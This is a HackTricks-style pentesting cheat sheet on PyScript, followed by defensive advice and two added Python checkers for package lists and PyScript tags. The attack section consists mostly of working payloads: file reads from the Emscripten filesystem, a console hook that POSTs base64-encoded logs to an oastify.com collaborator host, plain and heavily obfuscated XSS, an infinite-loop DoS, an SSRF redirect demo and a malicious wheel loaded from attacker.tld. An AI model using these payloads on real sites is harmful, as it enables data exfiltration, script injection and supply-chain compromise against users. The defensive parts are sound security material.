Pyscript
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
PyScript Pentesting Guide
PyScript is a new framework developed for integrating Python into HTML so that it can be used alongside HTML. In this cheat sheet you will find how to use PyScript for your penetration testing purposes.
Dumping / Retrieving files from the Emscripten virtual memory filesystem:
CVE ID: CVE-2022-30286
Code:
<py-script>
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
    out = fin.read()
print(out)
</py-script>
OOB Data Exfiltration of the Emscripten virtual memory filesystem (console monitoring)
CVE ID: CVE-2022-30286
Code:
<py-script>
x = "CyberGuy"
if x == "CyberGuy":
    with open('/lib/python3.10/asyncio/tasks.py') as output:
        contents = output.read()
        print(contents)
        # the multi-line <script> payload needs a triple-quoted string to be valid Python
        print('''
<script>
console.pylog = console.log
console.logs = []
console.log = function () {
    console.logs.push(Array.from(arguments))
    console.pylog.apply(console, arguments)
    fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {
        method: "POST",
        headers: { "Content-Type": "text/plain;charset=utf-8" },
        body: JSON.stringify({ content: btoa(console.logs) }),
    })
}
</script>
''')
</py-script>
Cross Site Scripting (Ordinary)
Code:
<py-script>
print("<img src=x onerror='alert(document.domain)'>")
</py-script>
Cross Site Scripting (Python Obfuscated)
Code:
<py-script>
sur = "\u0027al";fur = "e";rt = "rt"
p = "\x22x$$\x22\x29\u0027\x3E"
s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
e = "c\u003d";q = "x"
y = "o";m = "ner";z = "ror\u003d"
print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
</py-script>
Cross Site Scripting (JavaScript Obfuscation)
Code:
<py-script>
# print("""...""") is required: the original prinht("" was a typo and a
# two-quote string cannot span the lines below
print("""
<script>
var _0x3675bf = _0x5cf5
function _0x5cf5(_0xced4e9, _0x1ae724) {
    var _0x599cad = _0x599c()
    return (
        (_0x5cf5 = function (_0x5cf5d2, _0x6f919d) {
            _0x5cf5d2 = _0x5cf5d2 - 0x94
            var _0x14caa7 = _0x599cad[_0x5cf5d2]
            return _0x14caa7
        }),
        _0x5cf5(_0xced4e9, _0x1ae724)
    )
}
;(function (_0x5ad362, _0x98a567) {
    var _0x459bc5 = _0x5cf5,
        _0x454121 = _0x5ad362()
    while (!![]) {
        try {
            var _0x168170 =
                (-parseInt(_0x459bc5(0x9e)) / 0x1) *
                    (parseInt(_0x459bc5(0x95)) / 0x2) +
                (parseInt(_0x459bc5(0x97)) / 0x3) *
                    (-parseInt(_0x459bc5(0x9c)) / 0x4) +
                -parseInt(_0x459bc5(0x99)) / 0x5 +
                (-parseInt(_0x459bc5(0x9f)) / 0x6) *
                    (parseInt(_0x459bc5(0x9d)) / 0x7) +
                (-parseInt(_0x459bc5(0x9b)) / 0x8) *
                    (-parseInt(_0x459bc5(0x9a)) / 0x9) +
                -parseInt(_0x459bc5(0x94)) / 0xa +
                (parseInt(_0x459bc5(0x98)) / 0xb) *
                    (parseInt(_0x459bc5(0x96)) / 0xc)
            if (_0x168170 === _0x98a567) break
            else _0x454121["push"](_0x454121["shift"]())
        } catch (_0x5baa73) {
            _0x454121["push"](_0x454121["shift"]())
        }
    }
})(_0x599c, 0x28895),
    prompt(document[_0x3675bf(0xa0)])
function _0x599c() {
    var _0x34a15f = [
        "15170376Sgmhnu",
        "589203pPKatg",
        "11BaafMZ",
        "445905MAsUXq",
        "432bhVZQo",
        "14792bfmdlY",
        "4FKyEje",
        "92890jvCozd",
        "36031bizdfX",
        "114QrRNWp",
        "domain",
        "3249220MUVofX",
        "18cpppdr",
    ]
    _0x599c = function () {
        return _0x34a15f
    }
    return _0x599c()
}
</script>
""")
</py-script>
DoS Attack (Infinite Loop)
Code:
<py-script>
while True:
    print(" ")
</py-script>
New vulnerabilities & techniques (2023-2025)
Server-Side Request Forgery via uncontrolled redirects (CVE-2025-50182)
urllib3 < 2.5.0 ignores the redirect and retries parameters when it runs inside the Pyodide runtime that ships with PyScript. When an attacker can influence the target URL, they can force the Python code to follow cross-origin redirects even where the developer explicitly disabled them, effectively bypassing anti-SSRF logic.
<script type="py">
import urllib3
http = urllib3.PoolManager(retries=False, redirect=False) # supposed to block redirects
r = http.request("GET", "https://evil.example/302") # will STILL follow the 302
print(r.status, r.url)
</script>
Fixed in urllib3 2.5.0 – update the package in your PyScript image or pin a safe version with packages = ["urllib3>=2.5.0"]. See the official CVE entry for more details.
Arbitrary package loading & supply-chain attacks
Because PyScript accepts arbitrary URLs in the packages list, a malicious actor who can modify or inject the configuration can execute fully arbitrary Python in the victim's browser:
<py-config>
packages = ["https://attacker.tld/payload-0.0.1-py3-none-any.whl"]
</py-config>
<script type="py">
import payload # executes attacker-controlled code during installation
</script>
Only pure-Python wheels are needed – no WebAssembly build step is required. Make sure the configuration cannot be controlled by the user, and host trusted wheels on your own origin over HTTPS with SRI hashes.
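An added example, not part of the original page or of PyScript itself: a server-side check for the packages list of a <py-config> block that enforces the two points from the sections above, wheels only from an allow-listed HTTPS origin and urllib3 pinned at or above 2.5.0. TRUSTED_ORIGINS, the accepted version operators and the sample entries are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed policy (not from PyScript): wheels may only be fetched from
# these HTTPS origins; everything else must be a plain PyPI-style specifier.
TRUSTED_ORIGINS = {"https://static.example.org"}
MIN_URLLIB3 = (2, 5, 0)  # CVE-2025-50182 is fixed in urllib3 2.5.0
# name, optional operator, optional version: "numpy", "urllib3>=2.5.0".
# Only '==' and '>=' are accepted so the pin cannot silently drift downwards.
SPEC_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(?:(==|>=)\s*([0-9][0-9.]*))?$")


def _version_tuple(ver):
    parts = [int(p) for p in ver.split(".") if p.isdigit()]
    return tuple(parts + [0] * (3 - len(parts)))  # "2.5" compares as 2.5.0


def check_packages(packages):
    """Return (entry, problem) pairs; an empty list means the config passes."""
    problems = []
    for entry in packages:
        if "://" in entry:  # wheel URL: scheme and origin must be trusted
            u = urlparse(entry)
            if u.scheme != "https":
                problems.append((entry, "wheel URL must use https"))
            elif f"{u.scheme}://{u.netloc.lower()}" not in TRUSTED_ORIGINS:
                problems.append((entry, "wheel origin not in allow-list"))
            elif not u.path.endswith(".whl"):
                problems.append((entry, "URL does not point at a wheel"))
            continue
        m = SPEC_RE.match(entry)
        if not m:  # relative paths, other operators, stray characters
            problems.append((entry, "not a plain PyPI specifier"))
            continue
        name, op, ver = m.group(1).lower(), m.group(2), m.group(3)
        if name == "urllib3" and (op is None or _version_tuple(ver) < MIN_URLLIB3):
            problems.append((entry, "urllib3 must be pinned to >= 2.5.0"))
    return problems


if __name__ == "__main__":
    # The page's malicious wheel URL next to an unpinned urllib3 entry.
    for pkg, why in check_packages(["https://attacker.tld/payload-0.0.1-py3-none-any.whl", "urllib3"]):
        print(f"REJECT {pkg}: {why}")
```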
Output sanitisation changes (2023+)
print() still injects raw HTML and is therefore XSS-prone (see the examples above). The newer display() helper escapes HTML by default – raw markup must be wrapped explicitly in pyscript.HTML().
from pyscript import display, HTML
display("<b>escaped</b>") # renders literally
display(HTML("<b>not-escaped</b>")) # executes as HTML -> potential XSS if untrusted
This behaviour was introduced in 2023 and is documented in the official Built-ins guide. Rely on display() for untrusted input and avoid calling print() directly.
Defensive Best Practices
- Update packages – bump to urllib3 >= 2.5.0 and regularly rebuild the wheels shipped with the site.
- Restrict package sources – reference PyPI names or same-origin URLs, ideally protected with Sub-resource Integrity (SRI).
- Harden the Content Security Policy – forbid inline JavaScript (script-src 'self' 'sha256-…') so that injected <script> blocks cannot execute.
- Forbid user-supplied <py-script> / <script type="py"> tags – sanitise HTML server-side before echoing it to other users.
- Isolate workers – if you do not need synchronous DOM access from workers, enable the sync_main_only flag to avoid the SharedArrayBuffer header requirements.
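An added example for the fourth point above, not code from the page or from the PyScript project: a stdlib-only detector that lists every PyScript entry point in user-submitted HTML so the server can reject the submission before echoing it. The element names are those used on this page; the MicroPython mpy variants are included as an assumption, and the sample submission is constructed.

```python
from html.parser import HTMLParser

# Constructed example (not PyScript project code). PyScript executes the
# body of these elements; <py-config> controls which packages get loaded.
PY_ELEMENTS = {"py-script", "py-config", "mpy-script", "mpy-config"}
# <script type="..."> values treated as Python ("mpy" = MicroPython, assumed
# here; the page itself only names "py").
PY_SCRIPT_TYPES = {"py", "mpy"}


class PyScriptDetector(HTMLParser):
    """Collect every PyScript execution point found in a document."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser already lower-cases tag and attribute names; values
        # are normalised here so that TYPE="Py " is not missed.
        attrs = {k: (v or "").strip().lower() for k, v in attrs}
        if tag in PY_ELEMENTS:
            self.findings.append(tag)
        elif tag == "script" and attrs.get("type") in PY_SCRIPT_TYPES:
            self.findings.append(f'script[type="{attrs["type"]}"]')


def find_pyscript_blocks(html):
    """Return the PyScript entry points in user-supplied HTML; reject the
    submission server-side when the list is not empty."""
    parser = PyScriptDetector()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    # Constructed user comment that smuggles a Python block past a naive filter.
    sample = '<p>Nice post!</p><SCRIPT TYPE="Py">print("smuggled")</SCRIPT>'
    print(find_pyscript_blocks(sample))  # ['script[type="py"]']
```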